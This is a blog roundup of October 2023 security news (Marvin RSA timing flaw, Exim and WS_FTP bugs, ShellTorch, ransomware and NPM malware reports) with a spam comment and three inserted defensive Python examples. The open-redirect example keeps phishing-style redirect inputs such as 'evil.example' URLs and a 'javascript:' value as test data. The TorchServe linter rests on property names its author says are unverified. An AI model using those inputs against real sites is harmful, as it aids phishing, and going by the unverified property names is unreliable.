This posting is here to collect cyber security news in October 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
Tomi Engdahl says:
New Marvin attack revives 25-year-old decryption flaw in RSA
https://www.bleepingcomputer.com/news/security/new-marvin-attack-revives-25-year-old-decryption-flaw-in-rsa/
A flaw related to the PKCS #1 v1.5 padding in SSL servers discovered in 1998 and believed to have been resolved still impacts several widely-used projects today.
After extensive testing that measures end-to-end operations, Red Hat researchers discovered several variations of the original timing attack, collectively called the ‘Marvin Attack,’ which can effectively bypass fixes and mitigations.
The problem allows attackers to potentially decrypt RSA ciphertexts, forge signatures, and even decrypt sessions recorded on a vulnerable TLS server.
Using standard hardware, the researchers demonstrated that executing the Marvin Attack within just a couple of hours is possible, proving its practicality.
Red Hat warns that the vulnerability isn’t limited to RSA but extends to most asymmetric cryptographic algorithms, making them susceptible to side-channel attacks.
“While the main venue of attack are TLS servers, the core issues that caused its widespread are applicable to most asymmetric cryptographic algorithms (Diffie-Hellman, ECDSA, etc.), not just to RSA.” – Red Hat.
Based on the conducted tests, the following implementations are vulnerable to the Marvin Attack:
OpenSSL (TLS level): Timing Oracle in RSA Decryption – CVE-2022-4304
OpenSSL (API level): Make RSA decryption API safe to use with PKCS#1 v1.5 padding – No CVE
GnuTLS (TLS level): Response times to malformed RSA ciphertexts in ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding. – CVE-2023-0361
NSS (TLS level): Improve constant-timeness in RSA operations. – CVE-2023-4421
pyca/cryptography: Attempt to mitigate Bleichenbacher attacks on RSA decryption; found to be ineffective; requires an OpenSSL level fix instead. – CVE-2020-25659
M2Crypto: Mitigate the Bleichenbacher timing attacks in the RSA decryption API; found to be ineffective; requires an OpenSSL level fix instead. – CVE-2020-25657
OpenSSL-ibmca: Constant-time fixes for RSA PKCS#1 v1.5 and OAEP padding in version 2.4.0 – No CVE
Go: crypto/rsa DecryptPKCS1v15SessionKey has limited leakage – No CVE
GNU MP: mpz_powm_sec leaks zero high order bits in result – No CVE
The researchers advise against using RSA PKCS#1 v1.5 encryption and urge impacted users to seek or request vendors to provide alternative backward compatibility avenues.
Simply disabling RSA does not mean you’re safe, warns the Q&A section of Marvin Attack’s page.
The risk is the same if the RSA key or certificate is used elsewhere on a server that supports it (SMTP, IMAP, POP mail servers, and secondary HTTPS servers).
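Added example (editor's note, not part of the comment above and not code from Red Hat's Marvin research): the Marvin Attack is a timing side channel, so the defensive point is that an RSA decryption path must take the same time whether or not the PKCS#1 v1.5 padding is well-formed. The toy below works on already-decrypted padding blocks (no real RSA), and places the early-exit unpad routine that leaks which check failed next to a version that inspects every byte on every call. The block length, message length and sample blocks are constructed; Python itself is not a constant-time language, so the timing helper is only an illustration of the pattern.

```python
# Added example, not code from the original post or from the Marvin Attack research.
# Toy PKCS#1 v1.5 unpadding (no real RSA) showing the early-exit pattern that
# creates a padding-validity timing oracle, next to a uniform-work version.
import secrets
import time

K = 32  # constructed block length in bytes; real RSA blocks are 256+ bytes


def pad_pkcs1_v15(message: bytes, k: int = K) -> bytes:
    """EME-PKCS1-v1_5: 0x00 0x02 || PS (non-zero bytes, at least 8) || 0x00 || M."""
    if len(message) > k - 11:
        raise ValueError("message too long for block")
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(k - 3 - len(message)))
    return b"\x00\x02" + ps + b"\x00" + message


def unpad_early_exit(block: bytes):
    """The pattern to avoid: each failing check returns immediately, so the
    time spent reveals which check failed. Returns the message or None."""
    if block[0] != 0x00 or block[1] != 0x02:
        return None                      # fastest path: bad header
    sep = block.find(b"\x00", 2)
    if sep == -1 or sep < 10:
        return None                      # slower path: separator missing or too early
    return block[sep + 1:]               # slowest path: valid padding


def unpad_uniform(block: bytes, msg_len: int):
    """Every byte is inspected on every call and nothing returns early.
    The expected message length is public (48 bytes for a TLS pre-master
    secret), so the separator position is fixed and only byte values are
    compared. Returns (ok, msg); msg is the trailing msg_len bytes whether or
    not ok is True, so the caller can swap in a random secret when ok is
    False without changing its own control flow, as TLS 1.2 requires."""
    k = len(block)
    if not 1 <= msg_len <= k - 11:
        raise ValueError("msg_len is a public parameter and must fit the block")
    sep = k - msg_len - 1               # where the 0x00 separator must sit
    bad = block[0] | (block[1] ^ 0x02) | int(sep < 10)
    for i in range(2, k):
        if i < sep:
            bad |= int(block[i] == 0)    # a zero inside PS: separator too early
        elif i == sep:
            bad |= int(block[i] != 0)    # separator byte must be zero
        # bytes after sep are the message; nothing to check, but the loop continues
    return bad == 0, block[k - msg_len:]


def time_calls(fn, block, reps=20000):
    """Rough wall-clock cost per call in nanoseconds (illustration only; a real
    measurement needs many more samples and a quiet machine)."""
    t0 = time.perf_counter_ns()
    for _ in range(reps):
        fn(block)
    return (time.perf_counter_ns() - t0) / reps


if __name__ == "__main__":
    msg = secrets.token_bytes(16)
    good = pad_pkcs1_v15(msg)
    bad_header = b"\x00\x01" + good[2:]               # constructed: wrong second byte
    no_separator = b"\x00\x02" + b"\x01" * (K - 2)    # constructed: no 0x00 at all
    for label, blk in [("valid", good), ("bad header", bad_header), ("no separator", no_separator)]:
        print(f"{label:13s} early-exit {time_calls(unpad_early_exit, blk):7.0f} ns   "
              f"uniform {time_calls(lambda b: unpad_uniform(b, 16), blk):7.0f} ns")
```

The early-exit version shows three distinct cost levels (bad header, bad separator, valid), which is exactly the distinguisher a Bleichenbacher-style oracle needs; the uniform version does the same work for all three. As the article notes, the Marvin findings show that the leak can also sit below this layer (in the bignum arithmetic), which is why the researchers recommend moving away from PKCS#1 v1.5 encryption rather than relying on unpadding fixes alone.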
Tomi Engdahl says:
Government
Government Shutdown Could Bench 80% of CISA Staff
Roughly 80% of CISA staff will be sent home at the end of the week in case of a government shutdown.
https://www.securityweek.com/80-of-cisa-staff-at-risk-of-furlough-as-government-shutdown-looms/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/millions-of-exim-mail-servers-exposed-to-zero-day-rce-attacks/
Karianne says:
Cybersecurity is paramount in today’s digital landscape. Protecting sensitive data and systems is crucial. To stay ahead of evolving threats, it’s essential to stay informed and utilize robust security measures. Check out https://trafkings.com/ for insights on monetizing traffic through affiliate programs while ensuring data security remains a top priority.
Tomi Engdahl says:
Data Protection
Researchers Extract Sounds From Still Images on Smartphone Cameras
https://www.securityweek.com/researchers-extract-sounds-from-still-images-on-smartphone-cameras/
A group of academic researchers devised a technique to extract sounds from still images captured using smartphone cameras with rolling shutter and movable lens structures.
Tomi Engdahl says:
Training & Awareness
CISA Kicks Off Cybersecurity Awareness Month With New Program
https://www.securityweek.com/cisa-kicks-off-cybersecurity-awareness-month-with-new-program/
CISA has announced the Secure Our World cybersecurity awareness program, targeting both businesses and end users.
To celebrate the 20th Cybersecurity Awareness Month, CISA has launched a new program, meant to promote four critical actions that businesses and individuals can take to improve cybersecurity.
Since 2004, October has been dedicated to raising awareness on the importance of cybersecurity for both private and public sectors, as part of a collaborative effort between government and industry.
This year, CISA is introducing Secure Our World, an initiative to deliver an “enduring message” to be integrated across CISA’s awareness campaigns and programs, encouraging both businesses and individuals to take action to protect their devices.
Tomi Engdahl says:
Unpatched Exim Vulnerabilities Expose Many Mail Servers to Attacks
https://www.securityweek.com/unpatched-exim-vulnerabilities-expose-many-mail-servers-to-attacks/
Patches are being developed for serious Exim vulnerabilities that could expose many mail servers to attacks.
The existence of several unpatched vulnerabilities impacting Exim mail transfer agent (MTA) installations was disclosed last week, more than one year after they were initially reported to developers.
Trend Micro’s Zero Day Initiative (ZDI) learned about six Exim vulnerabilities last year and reported the findings to the MTA software’s developers in June 2022. However, Exim developers have only now started working on patches, with accusations being made by both sides.
Exim, a piece of software used to receive and relay emails, is present on hundreds of thousands of servers. Vulnerabilities affecting the software can be highly valuable to threat actors, which have been known to exploit Exim flaws in their attacks.
Tomi Engdahl says:
Ransomware
Johnson Controls Hit by Ransomware
https://www.securityweek.com/johnson-controls-hit-by-ransomware/
Johnson Controls has confirmed being hit by a disruptive cyberattack, with a ransomware group claiming to have stolen 27Tb of information from the company.
Building technology giant Johnson Controls has confirmed being hit by a disruptive cyberattack that appears to have been carried out by a ransomware group.
An 8-K form filed by the company this week with the Securities and Exchange Commission (SEC) revealed that some of its internal IT infrastructure and applications were disrupted as a result of a cybersecurity incident.
An investigation has been launched to determine what type of information may have been compromised.
“To date, many of the Company’s applications are largely unaffected and remain operational. To the extent possible, and in line with its business continuity plans, the Company implemented workarounds for certain operations to mitigate disruptions and continue servicing its customers. However, the incident has caused, and is expected to continue to cause, disruption to parts of the Company’s business operations,” Johnson Controls said in the SEC filing.
The incident could force the company to delay the release of its fourth quarter and full fiscal year financial results.
Johnson Controls provides HVAC, automation, security, safety, smart home, retail, industrial refrigeration, and energy solutions and services. The company has more than 100,000 employees across 150 countries.
Threat intelligence group VX-Underground reported that a ransomware group known as Dark Angels is behind the attack on Johnson Controls. The hackers claim to have stolen 27Tb of data from the company’s systems.
Ransomware
Johnson Controls Ransomware Attack Could Impact DHS
https://www.securityweek.com/johnson-controls-ransomware-attack-could-impact-dhs/
DHS is reportedly investigating the impact of the recent Johnson Controls ransomware attack on its systems and facilities.
Sensitive Department of Homeland Security (DHS) information might have been compromised in a recent ransomware attack aimed at government contractor Johnson Controls International.
A multinational giant headquartered in Cork, Ireland, Johnson Controls produces industrial control systems and smart building equipment, software, and services, including HVAC, security, fire protection, and support solutions.
The company serves clients in the education, government, healthcare, hospitality, naval, and transportation sectors, including the DoD, DHS, and other government agencies in the US.
Tomi Engdahl says:
https://www.securityweek.com/chinese-gov-hackers-caught-hiding-in-cisco-router-firmware/
Tomi Engdahl says:
Data Breaches
European Telecommunications Standards Institute Discloses Data Breach
https://www.securityweek.com/european-telecommunications-standards-institute-discloses-data-breach/
Hackers stole a database containing the list of the European Telecommunications Standards Institute’s online users.
The European Telecommunications Standards Institute (ETSI) has disclosed a data breach following a cyberattack on its member’s portal.
Established in 1988, ETSI is an independent, not-for-profit organization that supports the development and testing of technical standards in the fields of information and communication, including technologies such as GSM, 3G, 4G, 5G, and others.
ETSI has over 900 member organizations from 65 countries across the globe, including academia, government, research entities, private organizations, and public bodies.
Last week, the France-based standardization body announced that hackers had breached “the IT system dedicated to its members’ work”, stealing the list of its online members.
“ETSI believes the database containing the list of their online users have been exfiltrated,” the organization said in an incident notice on its website.
ETSI says it has been working with the French National Cybersecurity Agency (ANSSI) to investigate the incident and that the vulnerability that led to the data breach has been fixed.
Tomi Engdahl says:
Incident Response
Live Exploitation Underscores Urgency to Patch Critical WS-FTP Server Flaw
https://www.securityweek.com/live-exploitation-underscores-urgency-to-patch-critical-ws-ftp-server-flaw/
Rapid7 says attackers are targeting a critical pre-authentication flaw in Progress Software’s WS_FTP server just days after disclosure.
Just days after the release of patches for a critical pre-authentication flaw in Progress Software’s WS_FTP server product, security experts have detected active exploitation in the wild against multiple target environments.
Cybersecurity vendor Rapid7 raised the alarm over the weekend after it spotted instances of live exploitation of the WS_FTP vulnerability in various customer environments.
According to Caitlin Condon, head of vulnerability research at Rapid7, the easy-to-exploit CVE-2023-40044 vulnerability is already in the crosshairs of attackers attempting mass exploitation of vulnerable WS_FTP servers.
“The process execution chain looks the same across all observed instances, indicating possible mass exploitation of vulnerable WS_FTP servers. Additionally, our MDR team has observed the same Burp Suite domain used across all incidents, which may point to a single threat actor behind the activity we’ve seen,” Condon said.
The critical-severity flaw, which carries a CVSS score of 10/10, can be triggered by attackers over the internet and affects all WS_FTP Server versions prior to 8.7.4 and 8.8.2.
Tomi Engdahl says:
NATO ‘actively addressing’ alleged cyberattack affecting some websites https://therecord.media/nato-siegedsec-unclassified-websites-alleged-cyberattack
The North Atlantic Treaty Organization (NATO) said it is investigating claims that data was stolen from unclassified websites under the military alliance’s control. A hacking group named SiegedSec — which has been at the center of several recent hacks involving U.S. municipalities over the last year — claimed to have stolen 9 GB of data.
A spokesperson for NATO told Recorded Future News that it is now investigating the claims but said that the alliance has not faced any operational issues.
“NATO is facing persistent cyber threats and takes cyber security seriously.
NATO cyber experts are actively addressing incidents affecting some unclassified NATO websites,” the spokesperson said.
In posts on Telegram, SiegedSec boasted of accessing several training portals and informational platforms run by NATO.
Tomi Engdahl says:
Qualcomm says hackers exploit 3 zero-days in its GPU, DSP drivers https://www.bleepingcomputer.com/news/security/qualcomm-says-hackers-exploit-3-zero-days-in-its-gpu-dsp-drivers/
Qualcomm is warning of three zero-day vulnerabilities in its GPU and Compute DSP drivers that hackers are actively exploiting in attacks. The American semiconductor company was told by Google’s Threat Analysis Group (TAG) and Project Zero teams that CVE-2023-33106, CVE-2023-33107, CVE-2022-22071, and CVE-2023-33063 may be under limited, targeted exploitation.
Qualcomm says it has released security updates that address the issues in its Adreno GPU and Compute DSP drivers, and impacted OEMs were also notified. The CVE-2022-22071 flaw was disclosed in May 2022 and is a high-severity (CVSS v3.1: 8.4) locally exploitable use after free bug impacting popular chips like the SD855, SD865 5G, and SD888 5G.
Tomi Engdahl says:
Warning: PyTorch Models Vulnerable to Remote Code Execution via ShellTorch https://thehackernews.com/2023/10/warning-pytorch-models-vulnerable-to.html
Cybersecurity researchers have disclosed multiple critical security flaws in the TorchServe tool for serving and scaling PyTorch models that could be chained to achieve remote code execution on affected systems. Israel-based runtime application security company Oligo, which made the discovery, has coined the vulnerabilities ShellTorch.
“These vulnerabilities [...] can lead to a full chain Remote Code Execution (RCE), leaving countless thousands of services and end-users — including some of the world’s largest companies — open to unauthorized access and insertion of malicious AI models, and potentially a full server takeover,” security researchers Idan Levcovich, Guy Kaplan, and Gal Elbaz said.
Tomi Engdahl says:
CVE-2023-4911: Looney Tunables – Local Privilege Escalation in the glibc’s ld.so https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so#potential-impact-of-looney-tunables
The Qualys Threat Research Unit (TRU) has discovered a buffer overflow vulnerability in GNU C Library’s dynamic loader’s processing of the GLIBC_TUNABLES environment variable. We have successfully identified and exploited this vulnerability (a local privilege escalation that grants full root privileges) on the default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13. It’s likely that other distributions are similarly susceptible, although we’ve noted that Alpine Linux remains an exception due to its use of musl libc instead of glibc. This vulnerability was introduced in April 2021.
Considering the identified vulnerability in the GNU C Library’s dynamic loader and its potential impact on systems, the Qualys Threat Research Unit advises security teams to prioritize patching this issue.
Tomi Engdahl says:
Android October security update fixes zero-days exploited in attacks https://www.bleepingcomputer.com/news/security/android-october-security-update-fixes-zero-days-exploited-in-attacks/
Google has released the October 2023 security updates for Android, addressing 54 unique vulnerabilities, including two known to be actively exploited. The two exploited flaws are CVE-2023-4863 and CVE-2023-4211, for which Google has “indications that they may be under limited, targeted exploitation.”
CVE-2023-4863 is a buffer overflow vulnerability in the ubiquitous open-source library libwebp, which impacts numerous software products, including Chrome, Firefox, iOS, Microsoft Teams, and many more. The particular flaw was initially erroneously assigned separate CVEs for Apple iOS and Google Chrome, although it was actually in the underlying library. A subsequent attempt to fix it by assigning a new CVE (CVE-2023-5129) was rejected.
CVE-2023-4211 is an actively exploited flaw impacting multiple versions of Arm Mali GPU drivers used in a broad range of Android device models.
Tomi Engdahl says:
CISA adds latest Chrome zero-day to Known Exploited Vulnerabilities Catalog https://www.theregister.com/2023/10/03/cisa_adds_latest_chrome_zeroday/
The US’s Cybersecurity and Infrastructure Security Agency (CISA) has added the latest actively exploited zero-day vulnerability affecting Google Chrome to its Known Exploited Vulnerabilities (KEV) Catalog. The bug, tracked as CVE-2023-5217, received a patch from Google last week and was assigned a severity rating of 8.8 on the CVSS v3 scale.
With its addition to the KEV Catalog, CISA has effectively indicated that exploits for the vulnerability pose a “significant risk to the federal enterprise,” and agencies in the Federal Civilian Executive Branch (FCEB) have been set a three-week deadline of October 23 to apply the recommended fixes.
The vulnerability itself is a heap buffer overflow vulnerability affecting VP8 encoding in libvpx, an open source video codec library from the WebM Project.
Google hasn’t released many details regarding the vulnerability or the exploit chain, saying the restriction to information will remain until the majority of its users have updated to the safe version of Chrome.
Tomi Engdahl says:
Virginia school district open despite LockBit ransomware attack https://therecord.media/virginia-school-district-open-lockbit
A school district in Virginia has managed to keep classrooms open despite facing an attack from a notorious Russian ransomware gang. Fauquier County Public Schools runs 20 elementary, middle and high schools for more than 11,200 students. The county is about an hour from Washington, D.C.
A spokesperson for the district confirmed to Recorded Future News that it suffered a ransomware attack on September 12 and “immediately engaged cybersecurity experts and notified the appropriate law enforcement agencies.”
Tomi Engdahl says:
Exim patches three of six zero-day bugs disclosed last week https://www.bleepingcomputer.com/news/security/exim-patches-three-of-six-zero-day-bugs-disclosed-last-week/
Exim developers have released patches for three of the zero-days disclosed last week through Trend Micro’s Zero Day Initiative (ZDI), one of them allowing unauthenticated attackers to gain remote code execution. Discovered by an anonymous security researcher, the security flaw (CVE-2023-42115) is due to an Out-of-bounds Write weakness found in the SMTP service and can be exploited by remote unauthenticated attackers to execute code in the context of the service account.
“The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer,” ZDI’s advisory explains. “Fix a possible OOB write in the external authenticator, which could be triggered by externally-supplied input,” the Exim development team says in the changelog of version 4.96.1, released today.
Tomi Engdahl says:
EvilProxy Phishing Attack Strikes Indeed https://menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
Menlo Labs recently identified a phishing campaign targeting executives in senior level roles across various industries, but primarily Banking and Financial services, Insurance providers, Property Management and Real Estate, and Manufacturing. This is a classic example of AiTM (Adversary In The Middle) phishing attack by harvesting session cookies enabling threat actors to bypass MFA protections.
In July 2023, Menlo Security HEAT Shield detected and blocked a novel phishing attack that involved an open redirection in the ‘indeed.com’ website redirecting victims to a phishing page impersonating Microsoft. Consequently, this makes an unsuspecting victim believe the redirection resulted from a trusted source such as ‘indeed.com’. The threat actors were found to deploy the phishing pages using the phishing-as-a-service platform named ‘EvilProxy’.
The service is advertised and sold on the dark web as a subscription-based offering with the plan validity ranging between 10 days, 20 days, and 31 days.
Tomi Engdahl says:
Critical TorchServe Flaws Could Expose AI Infrastructure of Major Companies
https://www.securityweek.com/critical-torchserve-flaws-could-expose-ai-infrastructure-of-major-companies/
ShellTorch attack chains critical TorchServe vulnerabilities and could completely compromise the AI infrastructure of major companies.
A series of critical vulnerabilities impacting a tool called TorchServe could allow threat actors to take complete control of servers that are part of the artificial intelligence (AI) infrastructure of some of the world’s largest companies, according to a cybersecurity firm.
The flaws were discovered by Oligo, a company that specializes in runtime application security and observability, which disclosed its findings on Tuesday. The firm named the attack ShellTorch.
TorchServe is an open source package in PyTorch, a machine learning framework used for applications such as computer vision and natural language processing. PyTorch is currently part of the Linux Foundation and received significant contributions from Meta (its original developer) and AWS.
TorchServe is used by organizations around the world and has more than 30,000 PyPi downloads every month and over one million DockerHub pulls. It’s used by major companies such as Amazon, Google, Intel, Microsoft, Tesla and Walmart.
Oligo researchers discovered that TorchServe is affected by three vulnerabilities, including two that have been assigned a ‘critical severity’ rating based on their CVSS score.
One of the issues is actually a default misconfiguration that results in the TorchServe management interface being exposed to remote access without authentication.
The other two vulnerabilities can be exploited for remote code execution, through server-side request forgery (SSRF), tracked as CVE-2023-43654, and through unsafe deserialization, tracked as CVE-2022-1471. It’s worth noting that while Oligo has assigned both issues a ‘critical’ rating, PyTorch developers have assigned a ‘high severity’ rating to CVE-2023-43654.
ShellTorch: Multiple Critical Vulnerabilities in PyTorch Model Server (TorchServe) (CVSS 9.9, CVSS 9.8) Threatens Countless AI Users – Immediate Action Required
https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654
This week, the Oligo Security research team announced the discovery of critical vulnerabilities (including CVE-2023-43654) that led to a full chain Remote Code Execution (RCE) and found thousands of vulnerable instances publicly exposed, including of some of the world’s largest organizations —
Executive Summary
TorchServe, a popular open-source package in the PyTorch ecosystem, contained vulnerabilities enabling a total takeover of impacted systems.
Oligo Security discovered that the default configuration of TorchServe accidentally exposes the management interface to the entire world, without any form of authentication, allowing unauthorized access.
Oligo also uncovered a new critical (NVD, CVSS 9.8) SSRF vulnerability (CVE-2023-43654) in the management interface that allows remote code execution (RCE), supporting configuration uploads from any domain.
Oligo researchers also found that TorchServe was vulnerable in a way that allows it to be hacked remotely with Remote Code Execution while unsafely deserializing a malicious model (GHSA, CVSS 9.9).
The combination of these attacks can result in RCE and takeover, with tens of thousands of exposed instances of vulnerable TorchServe applications in the wild.
Oligo Security initiated a responsible disclosure process regarding these issues to the maintainers of PyTorch (Amazon & Meta). Some of these issues were fixed or addressed with a warning in version 0.8.2, any instances using version 0.8.1 or less should be updated immediately. Since the default configuration does not prevent some of these issues and may leave users vulnerable, it is important to take mitigation actions, as suggested below.
Need to check if your environment is impacted? Use our free tool to find out now.
PyTorch: A Perfect Bullseye for Attacks on AI Infrastructure
The PyTorch library is at the confluence of AI models and OSS libraries. One of the world’s most-used machine learning frameworks, PyTorch presents an attractive target to attackers who want to breach AI-based systems. In late 2022, attackers leveraged dependency confusion to compromise a PyTorch package, infecting it with malicious code.
TorchServe is among the most popular model-serving frameworks for PyTorch. Maintained by Meta and Amazon (and an official CNCF project with the Linux Foundation), the open-source TorchServe library is trusted by organizations worldwide, with over 30,000 PyPi downloads per month and more than a million total DockerHub pulls. It is dominant in the research world (over 90% of ML research papers now use PyTorch), and its commercial users include some of the world’s biggest companies, including Walmart, Amazon, OpenAI, Tesla, Azure, Google Cloud, Intel, and many more. TorchServe is also the base for projects such as KubeFlow, MLFlow, Kserve, AWS Neuron, and more. It is also offered as a managed service by the largest cloud providers, including SageMaker (AWS) and Vertex.AI (GCP).
Using a simple IP scanner we were able to find tens of thousands of IP addresses that are currently completely exposed to the attack – including many belonging to Fortune 500 organizations.
The vulnerabilities Oligo discovered impact all versions of TorchServe prior to 0.8.2. When used by a malicious actor, this chain of vulnerabilities results in remote code execution, allowing a complete takeover of the victim’s servers and networks and exfiltration of sensitive data.
Anatomy of a ShellTorch attack: The path to total takeover
By exploiting ShellTorch CVE-2023-43654, an attacker can execute code and take over the target server. This includes abusing an API misconfiguration that allows accessing the management console remotely without any authentication, exploiting a remote Server-Side Request Forgery (SSRF) vulnerability that allows uploading a malicious model that leads to code execution. Our research team has also found another unsafe deserialization vulnerability that can be triggered remotely, which exposes another attack vector to execute arbitrary code. By doing so, the attacker will obtain a way to infiltrate the network and use the resulting high privileges for lateral movement.
Using high privileges granted by these vulnerabilities, it is possible to view, modify, steal and delete AI models and sensitive data flowing into and from the target TorchServe server.
AWS has published an advisory informing customers that versions 0.3.0 through 0.8.1 are impacted and 0.8.2 patches the flaws. Oligo said Meta took steps to address the default misconfiguration that exposed servers.
“The issues in TorchServe – an optional tool for PyTorch – were patched in August rendering the exploit chain described in this blog post moot. We encourage developers to use the latest version of TorchServe,” a Meta spokesperson told SecurityWeek.
https://aws.amazon.com/security/security-bulletins/AWS-2023-009/
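Added example (editor's note, not part of the comment above and not code from Oligo, PyTorch or the TorchServe project): the two configuration-level conditions the ShellTorch write-ups describe, a management API reachable from outside the host without authentication and model registration allowed from arbitrary URLs, can both be caught by linting the server's config.properties before deployment. The property names used here (inference_address, management_address, metrics_address, allowed_urls) are assumed from TorchServe's configuration documentation as I remember it and should be checked against the version you run; the two sample configurations are constructed.

```python
# Added example, not code from Oligo, PyTorch/TorchServe or the original post.
# Lints a TorchServe config.properties for the two conditions the article
# describes: a management API reachable from other hosts, and model
# registration allowed from arbitrary URLs. Property names are ASSUMED from
# TorchServe's configuration docs; verify them against your installed version.
import re
from urllib.parse import urlparse

LOOPBACK = {"127.0.0.1", "localhost", "::1"}
# Regex entries in allowed_urls that place no restriction on the source host.
ANY_URL_PATTERN = re.compile(r"(?:https?|file)?:?/*\.\*")


def parse_properties(text: str) -> dict:
    """Minimal Java-style .properties reader: key=value lines, '#' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def lint_torchserve_config(text: str) -> list:
    """Return a list of (code, message) findings; an empty list means no issue found."""
    props = parse_properties(text)
    findings = []

    # 1. Management API bound to a non-loopback address (the default-misconfiguration issue).
    mgmt = props.get("management_address")
    if mgmt is None:
        findings.append(("MGMT_DEFAULT",
                         "management_address not set: the build's built-in default applies; "
                         "confirm the management API is not reachable from other hosts"))
    else:
        host = urlparse(mgmt).hostname
        if host not in LOOPBACK:
            findings.append(("MGMT_EXPOSED",
                             f"management_address binds {host}: the unauthenticated management "
                             "API is reachable from other hosts"))

    # 2. Model registration from any URL (the SSRF, CVE-2023-43654, addressed in 0.8.2).
    allowed = props.get("allowed_urls")
    if not allowed:
        findings.append(("URLS_UNRESTRICTED",
                         "allowed_urls not set: restrict model registration to your own model storage"))
    else:
        for entry in (e.strip() for e in allowed.split(",")):
            if ANY_URL_PATTERN.fullmatch(entry):
                findings.append(("URLS_WILDCARD",
                                 f"allowed_urls entry '{entry}' permits every source URL"))
    return findings


# Constructed sample configurations (not TorchServe's shipped defaults).
EXPOSED_CONFIG = """
inference_address=http://0.0.0.0:8080
management_address=http://0.0.0.0:8081
metrics_address=http://0.0.0.0:8082
"""

HARDENED_CONFIG = """
inference_address=http://0.0.0.0:8080
management_address=http://127.0.0.1:8081
metrics_address=http://127.0.0.1:8082
allowed_urls=https://models.example.internal/.*
"""


if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label)
        for code, msg in lint_torchserve_config(cfg) or [("OK", "no findings")]:
            print(f"  [{code}] {msg}")
```

Binding the management port to loopback only helps if nothing on the host proxies it outward, and allowed_urls only exists on versions that carry the 0.8.2 fix, so the version check the AWS bulletin describes (0.3.0 through 0.8.1 affected) still comes first.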
Tomi Engdahl says:
Synqly Joins Race to Fix Security, Infrastructure Product Integrations
https://www.securityweek.com/synqly-joins-race-to-fix-security-infrastructure-product-integrations/
Silicon Valley startup lands $4 million in seed funding from SYN Ventures, Okta Ventures and Secure Octane.
Tomi Engdahl says:
US Executives Targeted in Phishing Attacks Exploiting Flaw in Indeed Job Platform
https://www.securityweek.com/us-executives-targeted-in-phishing-attacks-exploiting-flaw-in-indeed-job-platform/
An open redirection vulnerability in the popular job search platform Indeed has been exploited in a series of phishing attac
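Added example (editor's note, not part of either comment above and not code from Menlo Labs, Indeed or SecurityWeek): both articles describe an open redirection on a trusted domain being used to make a phishing link look legitimate. The snippet below shows the vulnerable pattern, a redirect endpoint echoing whatever its parameter holds into the Location header, next to an allowlist check that accepts only same-site paths or absolute URLs on explicitly permitted hosts. The site host and the test URLs are constructed.

```python
# Added example, not code from Menlo Labs, Indeed or the original post.
# Constructed site host and URLs; shows the open-redirect pattern the articles
# describe next to the allowlist check a redirect endpoint should apply.
from urllib.parse import urlparse

SITE_HOST = "jobs.example.com"   # constructed: the host that owns the redirect endpoint


def redirect_location_open(next_param: str) -> str:
    """The vulnerable pattern: whatever the ?next= parameter holds is echoed
    into the Location header, so the trusted domain vouches for any destination."""
    return next_param


def redirect_location_checked(next_param: str, allowed_hosts=frozenset({SITE_HOST})) -> str:
    """Return a redirect target that is either a same-site path or an absolute
    http(s) URL whose host is explicitly allowed; anything else falls back to '/'."""
    target = next_param.strip()
    if any(ord(c) < 0x20 for c in target):
        return "/"                              # control characters: reject outright
    parts = urlparse(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference. Browsers treat '//', '///' and '/\' prefixes as
        # scheme-relative URLs, so only a single leading '/' is accepted.
        if target.startswith("//") or "\\" in target or not target.startswith("/"):
            return "/"
        return target
    # Absolute URL: scheme must be http(s) and the parsed host (not the raw
    # string, which defeats 'https://jobs.example.com@evil.example') must be allowed.
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return target
    return "/"


if __name__ == "__main__":
    # Constructed inputs of the kind a phishing link would carry.
    samples = [
        "/dashboard?tab=1",
        "https://jobs.example.com/apply?id=42",
        "https://evil.example/login",
        "//evil.example/",
        "/\\evil.example/",
        "https://jobs.example.com@evil.example/",
        "javascript:alert(1)",
    ]
    for s in samples:
        print(f"{s!r:45} open -> {redirect_location_open(s)!r:45} checked -> {redirect_location_checked(s)!r}")
```

The usual weak fix, checking that the parameter starts with the site's own domain string, still passes userinfo tricks and look-alike subdomains; comparing the parsed hostname against an allowlist is what closes the gap. If a redirect to arbitrary external sites is a product requirement, an interstitial page that shows the destination is the fallback, not an unchecked 302.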
Tomi Engdahl says:
Dozens of Malicious NPM Packages Steal User, System Data
https://www.securityweek.com/dozens-of-malicious-npm-packages-steal-user-system-data/
Fortinet warns of multiple malicious NPM packages that include install scripts designed to steal sensitive information.
Fortinet’s security researchers have identified multiple malicious NPM packages containing obfuscated scripts designed to harvest a trove of information from victims’ systems.
On Monday, Fortinet warned of 35 malicious packages in the NPM Registry containing install scripts capable of collecting system and user data and exfiltrating it via a webhook or file-sharing link.
The cybersecurity company has grouped the packages into nine different sets, based on similarities in styles of code and functions, including the targeting of specific sensitive information for exfiltration.
The install scripts within these packages would run pre- or post-install to perform data harvesting, but would also be executed when the NPM package was installed.
The first set of packages includes an obfuscated index.js script capable of stealing Kubernetes configurations, SSH keys, and other sensitive information. System data such as IP address, hostname, and username is targeted as well.
The second set of packages contains an index.js file designed to send an HTTP GET request to a specific URL, to scan for specific files and directories, and to exfiltrate developer data, such as source code and configuration files.
“The targeted files and directories may contain highly valuable intellectual property and sensitive information, such as various application and service credentials. It then archives these files and directories and uploads the resulting archives to an FTP server,” Fortinet explains.
Malicious Packages Hidden in NPM
https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm
Affected platforms: All platforms where NPM packages can be installed
